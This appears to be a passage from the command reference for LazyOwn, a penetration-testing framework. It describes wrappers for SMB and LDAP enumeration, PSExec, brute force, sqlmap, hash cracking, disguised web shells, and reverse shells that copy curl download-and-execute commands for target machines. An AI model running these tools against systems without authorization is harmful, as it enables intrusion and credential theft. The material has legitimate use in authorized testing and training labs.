Note: - Ensure that the specified JSON file exists in the current directory and is properly formatted. - The confirmation message includes color formatting for better visibility.

exit

Exit the command line interface.

This function prompts the user to confirm whether they want to exit the command line interface. If confirmed, it will terminate the program. Otherwise, it will cancel the exit.

Usage: exit

:param arg: This parameter is not used in this function. :type arg: str

:returns: None

Manual execution: 1. Prompt the user with a confirmation message to exit the CLI. 2. If the user confirms with ‘s’, print a message and exit the program. 3. If the user provides any other input, print a cancellation message and remain in the CLI.

Dependencies: - sys.exit function for exiting the program.

Example: To execute the function, simply call exit.

Note: - The confirmation prompt is in Spanish. - Ensure that sys is imported in your script.

fixperm

Fix permissions for LazyOwn shell scripts.

This function adjusts the file permissions for shell scripts and CGI scripts in the modules directory, making them executable.

Usage: fixperm

:param line: This parameter is not used in this function. :type line: str

:returns: None

Manual execution: 1. Change the permissions of all shell scripts in the modules directory to be executable. 2. Change the permissions of all files in the modules/cgi-bin directory to be executable.

Dependencies: - chmod command must be available on the system.

Example: To execute the function, simply call fixperm.

Note: - Ensure you have the necessary permissions to modify file permissions.

lazywebshell

Run LazyOwn webshell server.

This function starts a web server that serves the lazywebshell.py script from the modules directory on port 8888. The server is run in the background.

Usage: lazywebshell

:param line: This parameter is not used in this function. :type line: str

:returns: None

Manual execution: 1. Start a Python HTTP server with CGI support on port 8888. 2. The server serves files from the modules directory.

Dependencies: - Python 3.x must be installed on the system. - The http.server module should be available.

Example: To execute the function, simply call lazywebshell.

Note: - The server runs in the background, and the output will not be displayed in the terminal.

getcap

Retrieve and display file capabilities on the system.

This function uses the getcap command to recursively list capabilities for files starting from the root directory (/). The output is filtered to suppress error messages.

Usage: getcap

:param line: This parameter is not used in this function. :type line: str

:returns: None

Manual execution: 1. Run the getcap -r / command to list file capabilities recursively from the root directory. 2. Redirect standard error to /dev/null to suppress error messages. 3. Copy to clipboard the command to appy in the victim machine. Dependencies: - getcap must be installed on the system.

Example: To execute the function, simply call do_getcap.

Note: - The command may require elevated permissions to access certain directories and files.

getseclist

Get the SecLists wordlist from GitHub.

This function downloads and extracts the SecLists wordlist from GitHub to the /usr/share/wordlists/ directory.

Usage: getseclist

:param line: This parameter is not used in this function. :type line: str

:returns: None

Manual execution: 1. Navigate to the /usr/share/wordlists/ directory. 2. Download the SecLists repository using wget. 3. Extract the downloaded ZIP file. 4. Remove the ZIP file after extraction.

Dependencies: - wget must be installed on the system. - unzip must be installed on the system. - sudo must be available for downloading and extracting files.

Example: To execute the function, simply call getseclist.

Note: - Ensure that you have the necessary permissions to write to the /usr/share/wordlists/ directory. - If wget or unzip is not installed, the function will fail.

smbclient

Interacts with SMB shares using the smbclient command to perform the following operations:

  1. Checks if rhost (remote host) and lhost (local host) are assign; if not, an error message is displayed.
  2. If line (share name) is provided:
  1. If line is not provided:
  1. Suggests a potential SMB exploit if possible by mounting the share from the local host using: mount -t cifs "//{lhost}/share" /mnt/smb

:param line: The name of the SMB share to access on the remote host. If not provided, the function will list all available shares. :returns: None

smbclient_py

Interacts with SMB shares using the smbclient.py command to perform the following operations:

  1. Checks if rhost (remote host) and lhost (local host) are assign; if not, an error message is displayed.
  2. If line (share name) is provided:
  1. If line is not provided:
  1. Suggests a potential SMB exploit if possible by mounting the share from the local host using: mount -t cifs "//{lhost}/share" /mnt/smb

:param line: The name of the SMB share to access on the remote host. If not provided, the function will list all available shares. :returns: None

smbmap

smbmap -H 10.10.10.3 [OPTIONS] Uses the smbmap tool to interact with SMB shares on a remote host:

  1. Checks if rhost (remote host) and lhost (local host) are assign; if not, an error message is displayed.
  2. If no line (share name or options) is provided:
  1. If line is provided:
  1. Suggests a potential SMB exploit if possible by mounting the share from the local host using: mount -t cifs "//{lhost}/documents" /mnt/smb

:param line: Options or share name to use with smbmap. If not provided, uses a default user to list shares. :returns: None

getnpusers

sudo impacket-GetNPUsers mist.htb/ -no-pass -usersfile sessions/users.txt Executes the impacket-GetNPUsers command to enumerate users with Kerberos pre-authentication disabled.

  1. Checks if the line (domain) argument is provided; if not, an error message is displayed, instructing the user to provide a domain.
  2. Executes impacket-GetNPUsers with the following options:

:param line: The domain to query. Must be provided in the format domain.com. Example usage: getnpusers domain.com :returns: None

Manual execution: To manually run this command, use the following syntax: sudo impacket-GetNPUsers -no-pass -usersfile sessions/users.txt Replace <domain> with the actual domain name you want to query.

psexec

Executes the Impacket PSExec tool to attempt remote execution on the specified target.

This function performs the following actions: 1. Checks if the provided target host (rhost) is valid. 2. If the line argument is “pass”, it searches for credential files with the pattern credentials*.txt and allows the user to select which file to use for executing the command. 3. If the line argument is not “pass”, it assumes execution without a password (using the current credentials). 4. Copies the rhost IP address to the clipboard for ease of use.

Parameters: line (str): A command argument to determine the action. If “pass”, the function searches for credential files and authenticates using the selected file. Otherwise, it executes PSExec without a password using the rhost IP.

Returns: None

psexec_py

Executes the Impacket PSExec tool to attempt remote execution on the specified target.

This function performs the following actions: 1. Checks if the provided target host (rhost) is valid. 2. If the line argument is “pass”, it searches for credential files with the pattern credentials*.txt and allows the user to select which file to use for executing the command. 3. If the line argument is not “pass”, it assumes execution without a password (using the current credentials). 4. Copies the rhost IP address to the clipboard for ease of use.

Parameters: line (str): A command argument to determine the action. If “pass”, the function searches for credential files and authenticates using the selected file. Otherwise, it executes PSExec without a password using the rhost IP.

Returns: None

rpcdump

Executes the rpcdump.py script to dump RPC services from a target host.

  1. Retrieves the target host IP from the rhost parameter.
  2. Checks if the rhost parameter is valid using check_rhost(). If invalid, the function returns early.
  3. Executes the rpcdump.py script on port 135 and 593 to gather RPC service information from the target host.

:param line: This parameter is not used in this command but is included for consistency with other methods. :returns: None

Manual execution: To manually run this command, use the following syntax: rpcdump.py -p 135 rpcdump.py -p 593 Replace <target_host> with the IP address or hostname of the target machine.

dig

Executes the dig command to query DNS information.

  1. Retrieves the DNS server IP from the line parameter and the target host from the rhost parameter.
  2. If either the DNS server or rhost is not provided, an error message is printed.
  3. Executes the dig command to query the version of the DNS server and additional records.

:param line: DNS server IP or hostname. Must be provided for the dig command. :param rhost: Target host for additional dig queries.

:returns: None

Manual execution: To manually run these commands, use the following syntax: dig version.bind CHAOS TXT @ dig any @

Replace <dns_server> with the IP address or hostname of the DNS server, <domain> with the target domain, and <rhost> with the IP address or hostname of the target machine.

cp

Copies a file from the ExploitDB directory to the sessions directory.

  1. Retrieves the path to the ExploitDB directory and the target file from the line parameter.
  2. Copies the specified file from the ExploitDB directory to the sessions directory in the current working directory.

:param line: The relative path to the file within the ExploitDB directory. For example, java/remote/51884.py. :param exploitdb: The path to the ExploitDB directory. This must be assign in advance or provided directly.

:returns: None

Manual execution: To manually copy files, use the following syntax: cp

Replace <exploitdb_path> with the path to your ExploitDB directory, <file_path> with the relative path to the file, and <destination_path> with the path where you want to copy the file.

For example: cp /usr/share/exploitdb/exploits/java/remote/51884.py /path/to/sessions/

dnsenum

Performs DNS enumeration using dnsenum to identify subdomains for a given domain.

  1. Executes the dnsenum command with parameters to specify the DNS server, output file, and wordlist for enumeration.

:param line: The target domain to perform DNS enumeration on, e.g., ghost.htb. :param rhost: The DNS server to use for enumeration, e.g., 10.10.11.24. :param dnswordlist: The path to the DNS wordlist file used for subdomain discovery.

:returns: None

Manual execution: To manually perform DNS enumeration, use the following command: dnsenum –dnsserver –enum -p 0 -s 0 -o -f

Replace <dns_server> with the DNS server IP, <output_file> with the file path to save the results, <dns_wordlist> with the path to your DNS wordlist file, and <target_domain> with the domain to be enumerated.

For example: dnsenum –dnsserver 10.10.11.24 –enum -p 0 -s 0 -o sessions/subdomains.txt -f /path/to/dnswordlist.txt ghost.htb

dnsmap

Performs DNS enumeration using dnsmap to discover subdomains for a specified domain.

  1. Executes the dnsmap command to scan the given domain with a specified wordlist.

:param line: The target domain to perform DNS enumeration on, e.g., ghost.htb. :param dnswordlist: The path to the wordlist file used for DNS enumeration.

:returns: None

Manual execution: To manually perform DNS enumeration, use the following command: dnsmap -w

Replace <target_domain> with the domain you want to scan and <dns_wordlist> with the path to your DNS wordlist file.

For example: dnsmap ghost.htb -w /path/to/dnswordlist.txt

whatweb

Performs a web technology fingerprinting scan using whatweb.

  1. Executes the whatweb command to identify technologies used by the target web application.

:param line: This parameter is not used in the current implementation but could be used to pass additional options or arguments if needed. :param rhost: The target web host to be scanned, specified in the params dictionary.

:returns: None

Manual execution: To manually perform web technology fingerprinting, use the following command: whatweb

Replace <target_host> with the URL or IP address of the web application you want to scan.

For example: whatweb example.com

enum4linux

Performs enumeration of information from a target Linux/Unix system using enum4linux.

  1. Executes the enum4linux command with the -a option to gather extensive information from the specified target.

:param line: This parameter is not used in the current implementation but could be used to pass additional options or arguments if needed. :param rhost: The target host for enumeration, specified in the params dictionary.

:returns: None

Manual execution: To manually enumerate information from a Linux/Unix system, use the following command: enum4linux -a

Replace <target_host> with the IP address or hostname of the target system.

For example: enum4linux -a 192.168.1.10

nbtscan

Performs network scanning using nbtscan to discover NetBIOS names and addresses in a specified range.

  1. Executes the nbtscan command with the -r option to scan the specified range of IP addresses for NetBIOS information.

:param line: This parameter is not used in the current implementation but could be used to specify additional options or arguments if needed. :param rhost: The target network range for scanning, specified in the params dictionary.

:returns: None

Manual execution: To manually perform a NetBIOS scan across a network range, use the following command: sudo nbtscan -r

Replace <network_range> with the IP address range you want to scan. For example: sudo nbtscan -r 192.168.1.0/24

rpcclient

Executes the rpcclient command to interact with a remote Windows system over RPC (Remote Procedure Call) using anonymous credentials.

  1. Runs rpcclient with the -U '' (empty username) and -N (no password) options to connect to the target host specified by rhost.

:param line: This parameter is not used in the current implementation but could be used to specify additional options or arguments if needed. :param rhost: The IP address of the remote host to connect to, specified in the params dictionary.

:returns: None

Manual execution: To manually interact with a remote Windows system using RPC, use the following command: rpcclient -U ’’ -N

Replace <target_ip> with the IP address of the target system. For example: rpcclient -U ’’ -N 10.10.10.10

nikto

Runs the nikto tool to perform a web server vulnerability scan against the specified target host.

  1. Executes nikto with the -h option to specify the target host IP address.
  2. Installs nikto if it is not already installed.

:param line: This parameter is not used in the current implementation but could be used to specify additional options or arguments if needed. :param rhost: The IP address of the target web server, specified in the params dictionary.

:returns: None

Manual execution: To manually perform a web server vulnerability scan using nikto, use the following command: nikto -h

Replace <target_ip> with the IP address of the target web server. For example: nikto -h 10.10.10.10

finalrecon

Runs the finalrecon tool to perform a web server vulnerability scan against the specified target host.

  1. Executes finalrecon with the -h option to specify the target host IP address.

:param line: This parameter is not used in the current implementation but could be used to specify additional options or arguments if needed. :param rhost: The IP address of the target web server, specified in the params dictionary.

:returns: None

Manual execution: To manually perform a web server vulnerability scan using finalrecon, use the following command: finalrecon –url=http:// –full -o txt -cd

Replace <target_ip> with the IP address of the target web server. For example: finalrecon –url=http://192.168.1.92 –full -o txt -cd /home/gris/finalrecon

openssl_sclient

Uses openssl s_client to connect to a specified host and port, allowing for testing and debugging of SSL/TLS connections.

:param line: The port number to connect to on the target host. This must be provided as an argument. :param rhost: The IP address or hostname of the target server, specified in the params dictionary.

:returns: None

Manual execution: To manually connect to a server using openssl s_client and test SSL/TLS, use the following command: openssl s_client -connect :

Replace <target_ip> with the IP address or hostname of the target server and <port> with the port number. For example: openssl s_client -connect 10.10.10.10:443

ss

Uses searchsploit to search for exploits in the Exploit Database based on the provided search term.

:param line: The search term or query to find relevant exploits. This must be provided as an argument.

:returns: None

Manual execution: To manually search for exploits using searchsploit, use the following command: searchsploit

Replace <search_term> with the term or keyword you want to search for. For example: searchsploit kernel

wfuzz

Uses wfuzz to perform fuzzing based on provided parameters. This function supports various options for directory and file fuzzing.

:param line: The options and arguments for wfuzz. The line parameter can include the following: - sub <domain>: Fuzz DNS subdomains. Requires dnswordlist to be assign. - iis: Fuzz IIS directories. Uses a default wordlist if iiswordlist is not assign. - Any other argument: General directory and file fuzzing.

:returns: None

Manual execution: To manually use wfuzz for directory and file fuzzing, use the following commands:

  1. For fuzzing DNS subdomains: wfuzz -c -t -w -H ‘Host: FUZZ.

Example: wfuzz -c –hl=7 -t 200 -w /path/to/dnswordlist -H ‘Host: FUZZ.example.com’ example.com

  1. For fuzzing IIS directories: wfuzz -c -t -w /path/to/iiswordlist http:///FUZZ

Example: wfuzz -c –hl=7 -t 200 -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/IIS.fuzz.txt http://10.10.10.10/FUZZ

  1. For general directory and file fuzzing: wfuzz -c -t -w http:///FUZZ

Example: wfuzz -c –hl=7 -t 200 -w /path/to/dirwordlist http://10.10.10.10/FUZZ

launchpad

Searches for packages on Launchpad based on the provided search term and extracts codenames from the results. The distribution is extracted from the search term.

:param line: The search term to be used for querying Launchpad. The line parameter should be a string containing the search term, e.g., “8.2p1 Ubuntu 4ubuntu0.11”.

:returns: None

Manual execution: To manually execute the equivalent command, use the following steps:

  1. Extract the distribution from the search term:
  1. URL encode the search term:
  1. Use curl to perform the search and filter results: curl -s “https://launchpad.net/+search?field.text=” | grep ‘href’ | grep ‘’ | grep -oP ‘(?<=href=“https://launchpad.net//)[^/"]+’ | sort -u

Example: If the search term is “8.2p1 Ubuntu 4ubuntu0.11”, the command would be: curl -s “https://launchpad.net/+search?field.text=8.2p1%20Ubuntu%204ubuntu0.11” | grep ‘href’ | grep ‘ubuntu’ | grep -oP ‘(?<=href=“https://launchpad.net/ubuntu/)[^/"]+’ | sort -u

Notes: - Ensure that curl is installed and accessible in your environment. - The extracted codenames are printed to the console.

gobuster

Uses gobuster for directory and virtual host fuzzing based on provided parameters. Supports directory enumeration and virtual host discovery.

:param line: The options and arguments for gobuster. The line parameter can include the following: - url: Perform directory fuzzing on a specified URL. Requires url and dirwordlist to be assign. - vhost: Perform virtual host discovery on a specified URL. Requires url and dirwordlist to be assign. - Any other argument: General directory fuzzing with additional parameters.

:returns: None

Manual execution: To manually use gobuster, use the following commands:

  1. For directory fuzzing: gobuster dir –url / –wordlist

Example: gobuster dir –url http://example.com/ –wordlist /path/to/dirwordlist

  1. For virtual host discovery: gobuster vhost –append-domain -u -w –random-agent -t 600

Example: gobuster vhost –append-domain -u http://example.com -w /path/to/dirwordlist –random-agent -t 600

  1. For general directory fuzzing with additional parameters: gobuster dir –url http:/// –wordlist

Example: gobuster dir –url http://10.10.10.10/ –wordlist /path/to/dirwordlist -x .php,.html

addhosts

Adds an entry to the /etc/hosts file, mapping an IP address to a domain name.

:param line: The domain name to be added to the /etc/hosts file. - Example: permx.htb

:returns: None

Manual execution: To manually add a domain to the /etc/hosts file, use the following command:

sudo sh -c -e "echo '<rhost> <domain>' >> /etc/hosts"

Example: sudo sh -c -e “echo ‘10.10.11.23 permx.htb’ >> /etc/hosts”

This command appends the IP address and domain name to the /etc/hosts file, enabling local resolution of the domain.

cme

Execute CrackMapExec (CME) for SMB enumeration and authentication attempts against a target.

This function provides a range of SMB operations using CME, including: 1. RID brute-forcing, which attempts to enumerate users via RID cycling. 2. Share enumeration to list SMB shares on the target. 3. User authentication to verify credentials against the target. 4. Brute-force authentication using username and password lists. 5. Hash-based authentication to attempt access using an NTLM hash.

Parameters: line (str): Specifies the action to perform, which can be one of the following: - “rid”: Enumerates users by attempting RID brute-force. - “shares”: Lists SMB shares on the target. - “user”: Verifies credentials from a stored credential file or prompts for a username and password. - “brute”: Attempts brute-force authentication using a user and password dictionary. - “hash”: Attempts authentication using an NTLM hash file. If no valid option is provided, the function defaults to performing basic SMB enumeration.

Returns: None

Manual Execution Example: To manually run CrackMapExec for SMB enumeration, use:

crackmapexec smb <target>

Example: crackmapexec smb 10.10.11.24

This command performs basic SMB enumeration and checks against the specified target IP address.

ldapdomaindump

Dumps LDAP information using ldapdomaindump with credentials from a file.

:param line: The domain to use for authentication (e.g., ‘domain.local’).

:returns: None

Manual execution: To manually run ldapdomaindump for LDAP enumeration, use the following command:

ldapdomaindump -u '<domain>\<username>' -p '<password>' <target>

Example: ldapdomaindump -u ‘domain.local’ -p ‘passadmin123’ 10.10.11.23

Ensure you have a file sessions/credentials.txt in the format user:password, where each line contains credentials for the LDAP enumeration.

bloodhound

Perform LDAP enumeration using bloodhound-python with credentials from a file.

:param line: This parameter is not used in the function but could be used for additional options or domain information.

:returns: None

Manual execution: To manually run bloodhound-python for LDAP enumeration, use the following command:

bloodhound-python -c All -u '<username>' -p '<password>' -ns <target>

Example: bloodhound-python -c All -u ‘usuario’ -p ‘password’ -ns 10.10.10.10

Ensure you have a file sessions/credentials.txt with the format user:password, where each line contains credentials for enumeration.

ping

Perform a ping to check host availability and infer the operating system based on TTL values.

:param line: This parameter is not used in the function but could be used for additional options or settings.

:returns: None

Manual execution: To manually ping a host and determine its operating system, use the following command:

ping -c 1 <target>

Example: ping -c 1 10.10.10.10

The TTL (Time To Live) value is used to infer the operating system: - TTL values around 64 typically indicate a Linux system. - TTL values around 128 typically indicate a Windows system.

Ensure you have assign rhost to the target host for the command to work.

gospider

Try gospider for web spidering.

This function executes the gospider tool to perform web spidering. It can either use a URL provided as a parameter or the remote host defined in self.params.

Usage: gospider url gospider

:param line: Command parameter that determines the execution mode. Use “url” to specify a URL, or leave empty to use the remote host. :type line: str

:returns: None

Manual execution: 1. Ensure that the gospider tool is installed on the system. 2. assign the url parameter if using the “url” mode. 3. Run the method to perform the spidering operation.

Dependencies: - gospider must be installed on the system. - The sudo command must be available for installing gospider.

Examples: 1. To scan a specific URL: gospider url 2. To scan the remote host: gospider

Note: - If gospider is not installed, the method will attempt to install it. - Ensure that the network and tools are configured correctly for successful execution.

arpscan

Executes an ARP scan using arp-scan.

This function performs an ARP scan on the local network using the arp-scan tool. The network device to be used for scanning must be specified.

Usage: arpscan

:param line: Command parameters (not used in this function). :type line: str

:returns: None

Manual execution: 1. Ensure that the network device is assign using the appropriate parameter. 2. Run the method to perform an ARP scan.

Dependencies: - arp-scan must be installed on the system. - The sudo command must be available for executing arp-scan.

Examples: 1. assign the device parameter using assign device <network_device>. 2. Run arpscan to perform the ARP scan.

Note: - The network device must be configured and available on the system for the scan to work. - Ensure that arp-scan is installed and accessible from the command line.

lazypwn

Executes the LazyPwn script.

This function runs the lazypwn.py script located in the modules directory. The script is typically used for automated exploitation or security testing tasks within the LazyOwn framework.

Usage: lazypwn

:param line: Command parameters (not used in this function). :type line: str

:returns: None

Manual execution: 1. Run the method to execute the LazyPwn script.

Dependencies: - The lazypwn.py script must be present in the modules directory. - Python 3 must be installed and accessible from the command line.

Examples: 1. Run do_lazypwn to execute the LazyPwn script.

Note: - Ensure that lazypwn.py is configured correctly before running this method. - The script’s functionality depends on its implementation in modules/lazypwn.py.

fixel

Fixes file permissions and line endings in the project directories.

This function converts line endings from DOS/Windows format to Unix format for all files in the project directories. This helps to ensure consistent line endings and can prevent issues related to file format mismatches.

Usage: fixel

:param line: Command parameters (not used in this function). :type line: str

:returns: None

Manual execution: 1. Run the method to fix line endings in the specified directories.

Dependencies: - The dos2unix command must be installed and accessible from the command line.

Examples: 1. Run do_fixel to convert line endings for all files in the project directories.

Note: - This method only fixes line endings and does not modify file permissions. - Ensure that the dos2unix command is installed and functioning correctly.

smbserver

Sets up an SMB server using Impacket and creates an SCF file for SMB share access.

This function configures an SMB server to serve files from the sessions directory and generates an SCF file that points to the SMB share. The SCF file can be used to create a shortcut to the SMB share on a Windows system.

Usage: smbserver

:param line: Command parameters folder name (optional). :type line: str

:returns: None

Manual execution: 1. Ensure lhost is assign to a valid IP address or hostname. 2. Run the method to create the SCF file and start the SMB server. 3. Use the copied curl command to download the SCF file on the target system. 4. Ensure that impacket-smbserver is installed and accessible from the command line.

Dependencies: - The impacket-smbserver tool must be installed and accessible from the command line. - The check_lhost function must validate the lhost parameter.

Examples: 1. Run do_smbserver to assign up the SMB server and generate the SCF file. 2. Use the provided curl command to download the SCF file on the target system.

Note: - The SCF file is used to create a shortcut to the SMB share and should be accessible from the target system. - Ensure that the lhost parameter is correctly assign and that the SMB server is properly configured.

sqlmap

Uses sqlmap to perform SQL injection testing on a given URL or request file (you can get one with burpsuit or proxy command and foxyproxy plugin for browser).

This function allows the execution of sqlmap commands with various options, including testing URL endpoints, reading from request files, and using sqlmap’s wizard mode for easy configuration.

Usage: sqlmap req sqlmap req sqlmap req sqlmap req

sqlmap -wiz

:param line: Command parameters for sqlmap. :type line: str

  • If line starts with req, it expects the following formats:

  • req <request_file> <parameter>: Tests the specified parameter in the request file for SQL injection.

  • req <request_file> <parameter> <database>: Tests the specified parameter and attempts to dump tables from the specified database.

  • req <request_file> <parameter> <database> <table>: Tests the specified parameter and attempts to dump data from the specified table in the database.

  • If line starts with -wiz, it runs sqlmap’s wizard mode for interactive configuration.

  • If line is empty, it uses the URL specified in self.params["url"] to perform SQL injection testing with sqlmap.

:returns: None

Manual execution: 1. If using req, provide a valid request file and parameters. 2. Run sqlmap with the specified options for SQL injection testing. 3. To use the wizard mode, execute sqlmap -wizard. 4. For URL-based testing, ensure url is assign and run sqlmap with the URL.

Dependencies: - The sqlmap tool must be installed and accessible from the command line. - The request file specified in req should be located in the sessions directory.

Examples: sqlmap req requests.txt id sqlmap req requests.txt id database_name sqlmap req requests.txt id database_name table_name sqlmap -wiz

Note: - Ensure the request file exists and is readable before running sqlmap. - The URL must be assign for URL-based testing. - The wizard mode is useful for interactive configuration if you’re unsure about the options.

proxy

Runs a small proxy server to modify HTTP requests on the fly.

This function starts the lazyproxy.py script, which acts as a proxy server for intercepting and modifying HTTP requests. The server listens on port 8888.

Usage: proxy

:param line: This parameter is not used in the current implementation. :type line: str :returns: None

Manual execution: 1. Executes the lazyproxy.py script to start the proxy server. 2. The proxy server will run and modify requests as configured in the script.

Dependencies: - The lazyproxy.py script must be available in the modules directory.

Example: proxy

Note: - Ensure that the lazyproxy.py script is correctly configured before running. - The proxy server will be accessible at http://localhost:8888. - To stop the proxy server, terminate the running process manually.

createwebshell

Creates a web shell disguised as a .jpg file in the sessions directory.

This function performs the following actions: 1. Runs a Python script lazycreate_webshell.py to create a disguised web shell. 2. Downloads a PHP web shell from a specified URL and saves it to the sessions directory.

Usage: createwebshell

:param line: This parameter is not used in the current implementation. :type line: str :returns: None

Manual execution: 1. Executes the lazycreate_webshell.py script to create a web shell disguised as a .jpg file. 2. Downloads a PHP web shell from the GitHub repository and saves it to sessions.

Dependencies: - wget must be installed for downloading the web shell. - The lazycreate_webshell.py script must be available in the modules directory.

Example: createwebshell

Note: - Ensure that the lazycreate_webshell.py script is correctly configured and accessible. - Verify the URL in the wget command to ensure it points to a valid and safe web shell.

createrevshell

Creates a bash reverse shell script in the sessions directory with the specified lhost and lport values.

This function performs the following actions: 1. Checks if lhost and lport are assign. If not, it prints an error message and exits. 2. Creates a bash reverse shell script using the provided lhost and lport values. 3. Saves the script to sessions/revshell.sh. 4. Prints a message with the curl command to download and execute the reverse shell script. 5. Copies the curl command to the clipboard.

Usage: createrevshell

:param line: This parameter is not used in the current implementation. :type line: str :returns: None

Manual execution: 1. Creates or overwrites the file sessions/revshell.sh with the bash reverse shell script. 2. Displays the command to download and execute the script via curl. 3. Copies the curl command to the clipboard for easy use.

Dependencies: - Bash must be installed on the target system. - xclip must be installed for copying the command to the clipboard.

Example: createrevshell

Note: - Ensure that lhost and lport are assign before running this command. - The script will listen for incoming connections on the specified lport and connect back to lhost. - Adjust the lhost and lport as needed for your specific environment.

createwinrevshell

Creates a PowerShell reverse shell script in the sessions directory with the specified lhost and lport values.

This function performs the following actions: 1. Checks if lhost and lport are assign. If not, it prints an error message and exits. 2. Creates a PowerShell reverse shell script using the provided lhost and lport values. 3. Saves the script to sessions/revshell.ps1. 4. Prints a message with the command to download and execute the reverse shell script via curl. 5. Copies the curl command to the clipboard.

Usage: createwinrevshell

:param line: This parameter is not used in the current implementation. :type line: str :returns: None

Manual execution: 1. Creates or overwrites the file sessions/revshell.ps1 with the PowerShell reverse shell script. 2. Displays the command to download and execute the script via curl. 3. Copies the curl command to the clipboard for easy use.

Dependencies: - PowerShell must be installed on the target system. - xclip must be installed for copying the command to the clipboard.

Example: createwinrevshell

Note: - Ensure that lhost and lport are assign before running this command. - The script will listen for incoming connections on the specified lport and connect back to lhost. - Adjust the lhost and lport as needed for your specific environment.

createhash

Creates a hash.txt file in the sessions directory with the specified hash value and analyzes it using Name-the-hash.

This function performs the following actions: 1. Validates the input line to ensure it is not empty. 2. Backs up the existing hash.txt file if it exists, renaming it to hash_{timestamp}.txt based on the current timestamp. 3. Writes the provided hash value to sessions/hash.txt. 4. Analyzes the hash value using Name-the-hash.

Usage: createhash

:param line: The hash value to be written to hash.txt and analyzed. :type line: str :returns: None

Manual execution: 1. Creates or overwrites the file sessions/hash.txt with the specified hash value. 2. Analyzes the hash value using the nth command.

Dependencies: - sessions/hash.txt will be created in the sessions directory. - Name-the-hash must be installed and accessible via the command nth.

Example: createhash 5f4dcc3b5aa765d61d8327deb882cf99

Note: - Ensure the hash value is correct before running the analysis. - The hash value should be provided as a single argument without extra characters or spaces.

createcredentials

Creates a credentials.txt file in the sessions directory with the specified username and password.

This function performs the following actions: 1. Validates the input line to ensure it contains a colon (:), indicating the presence of both a username and password. 2. Backs up the existing credentials.txt file if it exists, renaming it to credentials_{username}.txt based on the existing username. 3. Writes the valid input to sessions/credentials.txt.

Usage: createcredentials user:password

:param line: The input line containing the username and password in the format user:password. :type line: str :returns: None

Manual execution: 1. Creates or overwrites the file sessions/credentials.txt with the specified username and password.

Dependencies: - sessions/credentials.txt will be created in the sessions directory.

Example: createcredentials administrator:passwordadministrator123&!

Note: - Ensure the input format is correct: user:password. - The credentials should be properly formatted with a colon separating the username and password.

createcookie

Creates a cookie.txt file in the sessions directory with the specified cookie value.

This function performs the following actions: 1. Extracts the cookie value from the provided input line using a regular expression. 2. Writes the extracted cookie value to sessions/cookie.txt.

Usage: createcookie cookie=user_data=valor_base64

:param line: The input line containing the cookie value in the format cookie=value. :type line: str :returns: None

Manual execution: 1. Creates or overwrites the file sessions/cookie.txt with the extracted cookie value.

Dependencies: - sessions/cookie.txt will be created in the sessions directory.

Example: createcookie cookie=user_data=valor_base64

Note: - Ensure the input format is correct: cookie=value. - The cookie value should be properly encoded and formatted as needed.

download_resources

Downloads resources into the sessions directory.

This function performs the following actions: 1. Changes to the sessions directory and executes download_resources.sh to download required resources.

Usage: download_resources

:param line: Not used in this function. :type line: str :returns: None

Manual execution: 1. Runs the download_resources.sh script in the sessions directory to download necessary resources.

Dependencies: - download_resources.sh must be present in the sessions directory.

Example: download_resources

Note: - Ensure that the download_resources.sh script is present in the sessions directory and is executable. - After running this command, you can use the www command as indicated by the printed message.

download_exploit

Downloads and sets up exploits in the external/.exploits/ directory and starts a web server to serve the files.

This function performs the following actions: 1. Changes to the external directory and executes install_external.sh to install necessary components or exploits. 2. Displays the IP addresses associated with network interfaces and copies the IP address of tun0 to the clipboard. 3. Lists the contents of the external/.exploit directory and starts a web server on port 8443 to serve the files in that directory. 4. Prints a message indicating the server’s status and the port it’s running on.

Usage: download_exploit

:param line: Not used in this function. :type line: str :returns: None

Manual execution: 1. Runs the install_external.sh script to assign up necessary components or exploits. 2. Displays network interface IP addresses and copies the IP address of tun0 to the clipboard. 3. Lists the contents of external/.exploit directory. 4. Starts a Python HTTP server on port 8443 in the external/.exploit directory to serve files.

Dependencies: - install_external.sh must be present in the external directory. - xclip must be installed for clipboard operations. - Python 3 must be installed to run the HTTP server.

Example: download_exploit

Note: - Ensure that the install_external.sh script is correctly configured and present in the external directory. - The HTTP server will be accessible on port 8443. - The function assumes the presence of external/.exploit directory and serves files from there.

dirsearch

Runs the dirsearch tool to perform directory and file enumeration on a specified URL.

This function executes dirsearch to scan a given URL for directories and files, while excluding specific HTTP status codes from the results. If dirsearch is not installed, the function will attempt to install it before running the scan.

Usage: dirsearch

:param line: Not used in this function. The URL is provided via the url parameter. :type line: str :returns: None

Manual execution: 1. If dirsearch is present, the command dirsearch -u <url> -x 403,404,400 is executed. 2. If dirsearch is not present, the function installs dirsearch using sudo apt install dirsearch -y and then runs the command.

Dependencies: - dirsearch must be installed. If not present, it will be installed using sudo apt. - Ensure the URL is assign via the url parameter before calling this function.

Example: dirsearch http://example.com/

Note: - Ensure that the url parameter is assign before calling this function. - The -x option specifies HTTP status codes to exclude from the results (e.g., 403, 404, 400). - The function will attempt to install dirsearch if it is not already installed.

john2hash

Runs John the Ripper with a specified wordlist and options.

This function executes John the Ripper to crack hashes using the specified wordlist and additional options. If no additional options are provided, it will attempt to display cracked hashes.

Usage: john2hash

:param line: Optional arguments to be passed to John the Ripper (e.g., --format=Raw-SHA512). If not provided, the function will default to showing the cracked hashes. :type line: str :returns: None

Manual execution: 1. If line is provided, the command sudo john sessions/hash.txt --wordlist=<wordlist> <options> is executed. 2. If line is not provided, the command sudo john sessions/hash.txt --wordlist=<wordlist> is executed to display the cracked hashes.

Dependencies: - John the Ripper must be installed and available in the system’s PATH. - Ensure the wordlist file exists at the specified path. - The sessions/hash.txt file must contain the hashes to be cracked.

Example: john2hash –format=Raw-SHA512 # If wordlist is assign to /usr/share/wordlists/rockyou.txt, the command executed will be sudo john sessions/hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA512.

Note: - Ensure that the wordlist parameter is set before calling this function. - Provide the necessary options as a string argument (e.g., --format=Raw-SHA512) if needed. - If no options are provided, the function defaults to showing the cracked hashes.

hashcat

Runs Hashcat with specified attack mode and hash type using a wordlist.

This function executes the Hashcat tool with the specified mode and wordlist file. The hash value to be cracked should be provided as an argument.

Usage: hashcat

:param line: The hash type or mode to be used with Hashcat (e.g., 0 for MD5). This is a required argument. :type line: str :returns: None

Manual execution: 1. The command hashcat -a 0 -m <mode> <hash> <wordlist> is executed, where <mode> is the hash type, <hash> is the hash to be cracked, and <wordlist> is the path to the wordlist file.

Dependencies: - Hashcat must be installed and available in the system’s PATH. - Ensure the wordlist file exists at the specified path.

